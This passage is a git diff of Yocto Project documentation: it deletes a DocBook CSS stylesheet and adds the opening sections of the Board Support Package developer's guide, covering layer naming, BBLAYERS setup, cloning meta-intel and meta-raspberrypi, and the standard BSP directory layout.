-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-.writernotes {
-  color: red;
-}
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title {
-  background-position: bottom;
-  background-repeat: repeat-x;
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/bsp-guide/bsp.rst b/documentation/bsp-guide/bsp.rst
new file mode 100644
index 0000000000..efb5328911
--- /dev/null
+++ b/documentation/bsp-guide/bsp.rst
@@ -0,0 +1,1532 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************************************************
+Board Support Packages (BSP) - Developer's Guide
+************************************************
+
+A Board Support Package (BSP) is a collection of information that
+defines how to support a particular hardware device, set of devices, or
+hardware platform. The BSP includes information about the hardware
+features present on the device and kernel configuration information
+along with any additional hardware drivers required. The BSP also lists
+any additional software components required in addition to a generic
+Linux software stack for both essential and optional platform features.
+
+This guide presents information about BSP layers, defines a structure
+for components so that BSPs follow a commonly understood layout,
+discusses how to customize a recipe for a BSP, addresses BSP licensing,
+and provides information that shows you how to create a BSP
+Layer using the :ref:`bitbake-layers <bsp-guide/bsp:Creating a new BSP Layer Using the \`\`bitbake-layers\`\` Script>`
+tool.
+
+BSP Layers
+==========
+
+A BSP consists of a file structure inside a base directory.
+Collectively, you can think of the base directory, its file structure,
+and the contents as a BSP layer. Although not a strict requirement, BSP
+layers in the Yocto Project use the following well-established naming
+convention: ::
+
+   meta-bsp_root_name
+
+The string "meta-" is prepended to the
+machine or platform name, which is "bsp_root_name" in the above form.
+
+.. note::
+
+   Because the BSP layer naming convention is well-established, it is
+   advisable to follow it when creating layers. Technically speaking, a
+   BSP layer name does not need to start with ``meta-``.
+   However, various scripts and tools in the Yocto Project development
+   environment assume this convention.
+
+To help understand the BSP layer concept, consider the BSPs that the
+Yocto Project supports and provides with each release. You can see the
+layers in the
+:ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+through
+a web interface at :yocto_git:`/`. If you go to that interface,
+you will find a list of repositories under "Yocto Metadata Layers".
+
+.. note::
+
+   Layers that are no longer actively supported as part of the Yocto
+   Project appear under the heading "Yocto Metadata Layer Archive."
+
+Each repository is a BSP layer supported by the Yocto Project (e.g.
+``meta-raspberrypi`` and ``meta-intel``). Each of these layers is a
+repository unto itself and clicking on the layer name displays two URLs
+from which you can clone the layer's repository to your local system.
+Here is an example that clones the Raspberry Pi BSP layer: ::
+
+   $ git clone git://git.yoctoproject.org/meta-raspberrypi
+
+In addition to BSP layers, the ``meta-yocto-bsp`` layer is part of the
+shipped ``poky`` repository. The ``meta-yocto-bsp`` layer maintains
+several "reference" BSPs including the ARM-based Beaglebone, MIPS-based
+EdgeRouter, and generic versions of both 32-bit and 64-bit IA machines.
+
+For information on typical BSP development workflow, see the
+:ref:`bsp-guide/bsp:developing a board support package (bsp)`
+section. For more
+information on how to set up a local copy of source files from a Git
+repository, see the
+:ref:`dev-manual/dev-manual-start:locating yocto project source files`
+section in the Yocto Project Development Tasks Manual.
+
+The BSP layer's base directory (``meta-bsp_root_name``) is the root
+directory of that Layer. This directory is what you add to the
+:term:`BBLAYERS` variable in the
+``conf/bblayers.conf`` file found in your
+:term:`Build Directory`, which is
+established after you run the OpenEmbedded build environment setup
+script (i.e. :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\``).
+Adding the root directory allows the :term:`OpenEmbedded Build System`
+to recognize the BSP
+layer and from it build an image. Here is an example: ::
+
+   BBLAYERS ?= " \
+      /usr/local/src/yocto/meta \
+      /usr/local/src/yocto/meta-poky \
+      /usr/local/src/yocto/meta-yocto-bsp \
+      /usr/local/src/yocto/meta-mylayer \
+      "
+
+.. note::
+
+   Ordering and :term:`BBFILE_PRIORITY` for the layers listed in ``BBLAYERS``
+   matter. For example, if multiple layers define a machine configuration, the
+   OpenEmbedded build system uses the last layer searched given similar layer
+   priorities. The build system works from the top-down through the layers
+   listed in ``BBLAYERS``.
+
+Some BSPs require or depend on additional layers beyond the BSP's root
+layer in order to be functional. In this case, you need to specify these
+layers in the ``README`` "Dependencies" section of the BSP's root layer.
+Additionally, if any build instructions exist for the BSP, you must add
+them to the "Dependencies" section.
+
+Some layers function as a layer to hold other BSP layers. These layers
+are known as ":term:`container layers <Container Layer>`". An example of
+this type of layer is OpenEmbedded's
+`meta-openembedded <https://github.com/openembedded/meta-openembedded>`__
+layer. The ``meta-openembedded`` layer contains many ``meta-*`` layers.
+In cases like this, you need to include the names of the actual layers
+you want to work with, such as: ::
+
+   BBLAYERS ?= " \
+     /usr/local/src/yocto/meta \
+     /usr/local/src/yocto/meta-poky \
+     /usr/local/src/yocto/meta-yocto-bsp \
+     /usr/local/src/yocto/meta-mylayer \
+     .../meta-openembedded/meta-oe \
+     .../meta-openembedded/meta-perl \
+     .../meta-openembedded/meta-networking \
+     "
+
+and so on.
+
+For more information on layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section of the Yocto Project Development Tasks Manual.
+
+Preparing Your Build Host to Work With BSP Layers
+=================================================
+
+This section describes how to get your build host ready to work with BSP
+layers. Once you have the host set up, you can create the layer as
+described in the
+":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section.
+
+.. note::
+
+   For structural information on BSPs, see the
+   :ref:`bsp-guide/bsp:example filesystem layout` section.
+
+#. *Set Up the Build Environment:* Be sure you are set up to use BitBake
+   in a shell. See the ":ref:`dev-manual/dev-manual-start:preparing the build host`"
+   section in the Yocto Project Development Tasks Manual for information on how
+   to get a build host ready that is either a native Linux machine or a machine
+   that uses CROPS.
+
+#. *Clone the poky Repository:* You need to have a local copy of the
+   Yocto Project :term:`Source Directory` (i.e. a local
+   ``poky`` repository). See the
+   ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`" and
+   possibly the
+   ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`" or
+   ":ref:`dev-manual/dev-manual-start:checking out by tag in poky`"
+   sections
+   all in the Yocto Project Development Tasks Manual for information on
+   how to clone the ``poky`` repository and check out the appropriate
+   branch for your work.
+
+#. *Determine the BSP Layer You Want:* The Yocto Project supports many
+   BSPs, which are maintained in their own layers or in layers designed
+   to contain several BSPs. To get an idea of machine support through
+   BSP layers, you can look at the
+   :yocto_dl:`index of machines </releases/yocto/&DISTRO_REL_TAG;/machines>`
+   for the release.
+
+#. *Optionally Clone the meta-intel BSP Layer:* If your hardware is
+   based on current Intel CPUs and devices, you can leverage this BSP
+   layer. For details on the ``meta-intel`` BSP layer, see the layer's
+   `README <http://git.yoctoproject.org/cgit/cgit.cgi/meta-intel/tree/README>`__
+   file.
+
+   #. *Navigate to Your Source Directory:* Typically, you set up the
+      ``meta-intel`` Git repository inside the :term:`Source Directory` (e.g.
+      ``poky``). ::
+
+         $ cd /home/you/poky
+
+   #. *Clone the Layer:* ::
+
+         $ git clone git://git.yoctoproject.org/meta-intel.git
+         Cloning into 'meta-intel'...
+         remote: Counting objects: 15585, done.
+         remote: Compressing objects: 100% (5056/5056), done.
+         remote: Total 15585 (delta 9123), reused 15329 (delta 8867)
+         Receiving objects: 100% (15585/15585), 4.51 MiB | 3.19 MiB/s, done.
+         Resolving deltas: 100% (9123/9123), done.
+         Checking connectivity... done.
+
+   #. *Check Out the Proper Branch:* The branch you check out for
+      ``meta-intel`` must match the same branch you are using for the
+      Yocto Project release (e.g. ``&DISTRO_NAME_NO_CAP;``): ::
+
+         $ cd meta-intel
+         $ git checkout -b &DISTRO_NAME_NO_CAP; remotes/origin/&DISTRO_NAME_NO_CAP;
+         Branch &DISTRO_NAME_NO_CAP; set up to track remote branch
+         &DISTRO_NAME_NO_CAP; from origin.
+         Switched to a new branch '&DISTRO_NAME_NO_CAP;'
+
+      .. note::
+
+         To see the available branch names in a cloned repository, use the ``git
+         branch -al`` command. See the
+         ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`"
+         section in the Yocto Project Development Tasks Manual for more
+         information.
+
+#. *Optionally Set Up an Alternative BSP Layer:* If your hardware can be
+   more closely leveraged to an existing BSP not within the
+   ``meta-intel`` BSP layer, you can clone that BSP layer.
+
+   The process is identical to the process used for the ``meta-intel``
+   layer except for the layer's name. For example, if you determine that
+   your hardware most closely matches the ``meta-raspberrypi``, clone
+   that layer: ::
+
+      $ git clone git://git.yoctoproject.org/meta-raspberrypi
+      Cloning into 'meta-raspberrypi'...
+      remote: Counting objects: 4743, done.
+      remote: Compressing objects: 100% (2185/2185), done.
+      remote: Total 4743 (delta 2447), reused 4496 (delta 2258)
+      Receiving objects: 100% (4743/4743), 1.18 MiB | 0 bytes/s, done.
+      Resolving deltas: 100% (2447/2447), done.
+      Checking connectivity... done.
+
+#. *Initialize the Build Environment:* While in the root directory of
+   the Source Directory (i.e. ``poky``), run the
+   :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\`` environment
+   setup script to define the OpenEmbedded build environment on your
+   build host. ::
+
+      $ source oe-init-build-env
+
+   Among other things, the script creates the :term:`Build Directory`, which is
+   ``build`` in this case and is located in the :term:`Source Directory`.  After
+   the script runs, your current working directory is set to the ``build``
+   directory.
+
+.. _bsp-filelayout:
+
+Example Filesystem Layout
+=========================
+
+Defining a common BSP directory structure allows end-users to understand
+and become familiar with that standard. A common format also encourages
+standardization of software support for hardware.
+
+The proposed form described in this section does have elements that are
+specific to the OpenEmbedded build system. It is intended that
+developers can use this structure with other build systems besides the
+OpenEmbedded build system. It is also intended that it will be be simple
+to extract information and convert it to other formats if required. The
+OpenEmbedded build system, through its standard :ref:`layers mechanism
+<overview-manual/overview-manual-yp-intro:the yocto project layer model>`, can
+directly accept the format described as a layer. The BSP layer captures
+all the hardware-specific details in one place using a standard format,
+which is useful for any person wishing to use the hardware platform
+regardless of the build system they are using.
+
+The BSP specification does not include a build system or other tools -
+the specification is concerned with the hardware-specific components
+only. At the end-distribution point, you can ship the BSP layer combined
+with a build system and other tools. Realize that it is important to
+maintain the distinction that the BSP layer, a build system, and tools
+are separate components that could be combined in certain end products.
+
+Before looking at the recommended form for the directory structure
+inside a BSP layer, you should be aware that some requirements do exist
+in order for a BSP layer to be considered compliant with the Yocto
+Project. For that list of requirements, see the
+":ref:`bsp-guide/bsp:released bsp requirements`" section.
+
+Below is the typical directory structure for a BSP layer. While this
+basic form represents the standard, realize that the actual layout for
+individual BSPs could differ. ::
+
+   meta-bsp_root_name/
+   meta-bsp_root_name/bsp_license_file
+   meta-bsp_root_name/README
+   meta-bsp_root_name/README.sources
+   meta-bsp_root_name/binary/bootable_images
+   meta-bsp_root_name/conf/layer.conf
+   meta-bsp_root_name/conf/machine/*.conf
+   meta-bsp_root_name/recipes-bsp/*
+   meta-bsp_root_name/recipes-core/*
+   meta-bsp_root_name/recipes-graphics/*
+   meta-bsp_root_name/recipes-kernel/linux/linux-yocto_kernel_rev.bbappend
+
+Below is an example of the Raspberry Pi BSP layer that is available from
+the :yocto_git:`Source Respositories <>`:
+
+.. code-block:: none
+
+   meta-raspberrypi/COPYING.MIT
+   meta-raspberrypi/README.md
+   meta-raspberrypi/classes
+   meta-raspberrypi/classes/sdcard_image-rpi.bbclass
+   meta-raspberrypi/conf/
+   meta-raspberrypi/conf/layer.conf
+   meta-raspberrypi/conf/machine/
+   meta-raspberrypi/conf/machine/raspberrypi-cm.conf
+   meta-raspberrypi/conf/machine/raspberrypi-cm3.conf
+   meta-raspberrypi/conf/machine/raspberrypi.conf
+   meta-raspberrypi/conf/machine/raspberrypi0-wifi.conf
+   meta-raspberrypi/conf/machine/raspberrypi0.conf
+   meta-raspberrypi/conf/machine/raspberrypi2.conf
+   meta-raspberrypi/conf/machine/raspberrypi3-64.conf
+   meta-raspberrypi/conf/machine/raspberrypi3.conf
+   meta-raspberrypi/conf/machine/include
+   meta-raspberrypi/conf/machine/include/rpi-base.inc
+   meta-raspberrypi/conf/machine/include/rpi-default-providers.inc
+   meta-raspberrypi/conf/machine/include/rpi-default-settings.inc
+   meta-raspberrypi/conf/machine/include/rpi-default-versions.inc
+   meta-raspberrypi/conf/machine/include/tune-arm1176jzf-s.inc
+   meta-raspberrypi/docs
+   meta-raspberrypi/docs/Makefile
+   meta-raspberrypi/docs/conf.py
+   meta-raspberrypi/docs/contributing.md
+   meta-raspberrypi/docs/extra-apps.md
+   meta-raspberrypi/docs/extra-build-config.md
+   meta-raspberrypi/docs/index.rst
+   meta-raspberrypi/docs/layer-contents.md
+   meta-raspberrypi/docs/readme.md
+   meta-raspberrypi/files
+   meta-raspberrypi/files/custom-licenses
+   meta-raspberrypi/files/custom-licenses/Broadcom
+   meta-raspberrypi/recipes-bsp
+   meta-raspberrypi/recipes-bsp/bootfiles
+   meta-raspberrypi/recipes-bsp/bootfiles/bcm2835-bootfiles.bb
+   meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb
+   meta-raspberrypi/recipes-bsp/common
+   meta-raspberrypi/recipes-bsp/common/firmware.inc
+   meta-raspberrypi/recipes-bsp/formfactor
+   meta-raspberrypi/recipes-bsp/formfactor/formfactor
+   meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi
+   meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi/machconfig
+   meta-raspberrypi/recipes-bsp/formfactor/formfactor_0.0.bbappend
+   meta-raspberrypi/recipes-bsp/rpi-u-boot-src
+   meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files
+   meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files/boot.cmd.in
+   meta-raspberrypi/recipes-bsp/rpi-u-boot-src/rpi-u-boot-scr.bb
+   meta-raspberrypi/recipes-bsp/u-boot
+   meta-raspberrypi/recipes-bsp/u-boot/u-boot
+   meta-raspberrypi/recipes-bsp/u-boot/u-boot/*.patch
+   meta-raspberrypi/recipes-bsp/u-boot/u-boot_%.bbappend
+   meta-raspberrypi/recipes-connectivity
+   meta-raspberrypi/recipes-connectivity/bluez5
+   meta-raspberrypi/recipes-connectivity/bluez5/bluez5
+   meta-raspberrypi/recipes-connectivity/bluez5/bluez5/*.patch
+   meta-raspberrypi/recipes-connectivity/bluez5/bluez5/BCM43430A1.hcd
+   meta-raspberrypi/recipes-connectivity/bluez5/bluez5brcm43438.service
+   meta-raspberrypi/recipes-connectivity/bluez5/bluez5_%.bbappend
+   meta-raspberrypi/recipes-core
+   meta-raspberrypi/recipes-core/images
+   meta-raspberrypi/recipes-core/images/rpi-basic-image.bb
+   meta-raspberrypi/recipes-core/images/rpi-hwup-image.bb
+   meta-raspberrypi/recipes-core/images/rpi-test-image.bb
+   meta-raspberrypi/recipes-core/packagegroups
+   meta-raspberrypi/recipes-core/packagegroups/packagegroup-rpi-test.bb
+   meta-raspberrypi/recipes-core/psplash
+   meta-raspberrypi/recipes-core/psplash/files
+   meta-raspberrypi/recipes-core/psplash/files/psplash-raspberrypi-img.h
+   meta-raspberrypi/recipes-core/psplash/psplash_git.bbappend
+   meta-raspberrypi/recipes-core/udev
+   meta-raspberrypi/recipes-core/udev/udev-rules-rpi
+   meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules
+   meta-raspberrypi/recipes-core/udev/udev-rules-rpi.bb
+   meta-raspberrypi/recipes-devtools
+   meta-raspberrypi/recipes-devtools/bcm2835
+   meta-raspberrypi/recipes-devtools/bcm2835/bcm2835_1.52.bb
+   meta-raspberrypi/recipes-devtools/pi-blaster
+   meta-raspberrypi/recipes-devtools/pi-blaster/files
+   meta-raspberrypi/recipes-devtools/pi-blaster/files/*.patch
+   meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb
+   meta-raspberrypi/recipes-devtools/python
+   meta-raspberrypi/recipes-devtools/python/python-rtimu
+   meta-raspberrypi/recipes-devtools/python/python-rtimu/*.patch
+   meta-raspberrypi/recipes-devtools/python/python-rtimu_git.bb
+   meta-raspberrypi/recipes-devtools/python/python-sense-hat_2.2.0.bb
+   meta-raspberrypi/recipes-devtools/python/rpi-gpio
+   meta-raspberrypi/recipes-devtools/python/rpi-gpio/*.patch
+   meta-raspberrypi/recipes-devtools/python/rpi-gpio_0.6.3.bb
+   meta-raspberrypi/recipes-devtools/python/rpio
+   meta-raspberrypi/recipes-devtools/python/rpio/*.patch
+   meta-raspberrypi/recipes-devtools/python/rpio_0.10.0.bb
+   meta-raspberrypi/recipes-devtools/wiringPi
+   meta-raspberrypi/recipes-devtools/wiringPi/files
+   meta-raspberrypi/recipes-devtools/wiringPi/files/*.patch
+   meta-raspberrypi/recipes-devtools/wiringPi/wiringpi_git.bb
+   meta-raspberrypi/recipes-graphics
+   meta-raspberrypi/recipes-graphics/eglinfo
+   meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-fb_%.bbappend
+   meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-x11_%.bbappend
+   meta-raspberrypi/recipes-graphics/mesa
+   meta-raspberrypi/recipes-graphics/mesa/mesa-gl_%.bbappend
+   meta-raspberrypi/recipes-graphics/mesa/mesa_%.bbappend
+   meta-raspberrypi/recipes-graphics/userland
+   meta-raspberrypi/recipes-graphics/userland/userland
+   meta-raspberrypi/recipes-graphics/userland/userland/*.patch
+   meta-raspberrypi/recipes-graphics/userland/userland_git.bb
+   meta-raspberrypi/recipes-graphics/vc-graphics
+   meta-raspberrypi/recipes-graphics/vc-graphics/files
+   meta-raspberrypi/recipes-graphics/vc-graphics/files/egl.pc
+   meta-raspberrypi/recipes-graphics/vc-graphics/files/vchiq.sh
+   meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics-hardfp.bb
+   meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.bb
+   meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.inc
+   meta-raspberrypi/recipes-graphics/wayland
+   meta-raspberrypi/recipes-graphics/wayland/weston_%.bbappend
+   meta-raspberrypi/recipes-graphics/xorg-xserver
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/10-evdev.conf
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/98-pitft.conf
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/99-calibration.conf
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config_0.1.bbappend
+   meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xorg_%.bbappend
+   meta-raspberrypi/recipes-kernel
+   meta-raspberrypi/recipes-kernel/linux-firmware
+   meta-raspberrypi/recipes-kernel/linux-firmware/files
+   meta-raspberrypi/recipes-kernel/linux-firmware/files/brcmfmac43430-sdio.bin
+   meta-raspberrypi/recipes-kernel/linux-firmware/files/brcfmac43430-sdio.txt
+   meta-raspberrypi/recipes-kernel/linux-firmware/linux-firmware_%.bbappend
+   meta-raspberrypi/recipes-kernel/linux
+   meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb
+   meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi.inc
+   meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.14.bb
+   meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.9.bb
+   meta-raspberrypi/recipes-multimedia
+   meta-raspberrypi/recipes-multimedia/gstreamer
+   meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx
+   meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx/*.patch
+   meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx_%.bbappend
+   meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_%.bbappend
+   meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12
+   meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12/*.patch
+   meta-raspberrypi/recipes-multimedia/omxplayer
+   meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer
+   meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer/*.patch
+   meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb
+   meta-raspberrypi/recipes-multimedia/x264
+   meta-raspberrypi/recipes-multimedia/x264/x264_git.bbappend
+   meta-raspberrypi/wic meta-raspberrypi/wic/sdimage-raspberrypi.wks
+
+The following sections describe each part of the proposed BSP format.
+
+.. _bsp-filelayout-license:
+
+License Files
+-------------
+
+You can find these files in the BSP Layer at: ::
+
+   meta-bsp_root_name/bsp_license_file
+
+These optional files satisfy licensing requirements for the BSP. The
+type or types of files here can vary depending on the licensing
+requirements. For example, in the Raspberry Pi BSP, all licensing
+requirements are handled with the ``COPYING.MIT`` file.
+
+Licensing files can be MIT, BSD, GPLv*, and so forth. These files are
+recommended for the BSP but are optional and totally up to the BSP
+developer. For information on how to maintain license compliance, see
+the ":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _bsp-filelayout-readme:
+
+README File
+-----------
+
+You can find this file in the BSP Layer at: ::
+
+   meta-bsp_root_name/README
+
+This file provides information on how to boot the live images that are
+optionally included in the ``binary/`` directory. The ``README`` file
+also provides information needed for building the image.
+
+At a minimum, the ``README`` file must contain a list of dependencies,
+such as the names of any other layers on which the BSP depends and the
+name of the BSP maintainer with his or her contact information.
+
+.. _bsp-filelayout-readme-sources:
+
+README.sources File
+-------------------
+
+You can find this file in the BSP Layer at: ::
+
+   meta-bsp_root_name/README.sources
+
+This file provides information on where to locate the BSP source files
+used to build the images (if any) that reside in
+``meta-bsp_root_name/binary``. Images in the ``binary`` would be images
+released with the BSP. The information in the ``README.sources`` file
+also helps you find the :term:`Metadata`
+used to generate the images that ship with the BSP.
+
+.. note::
+
+   If the BSP's ``binary`` directory is missing or the directory has no images, an
+   existing ``README.sources`` file is meaningless and usually does not exist.
+
+.. _bsp-filelayout-binary:
+
+Pre-built User Binaries
+-----------------------
+
+You can find these files in the BSP Layer at: ::
+
+   meta-bsp_root_name/binary/bootable_images
+
+This optional area contains useful pre-built kernels and user-space
+filesystem images released with the BSP that are appropriate to the
+target system. This directory typically contains graphical (e.g. Sato)
+and minimal live images when the BSP tarball has been created and made
+available in the :yocto_home:`Yocto Project <>` website. You can
+use these kernels and images to get a system running and quickly get
+started on development tasks.
+
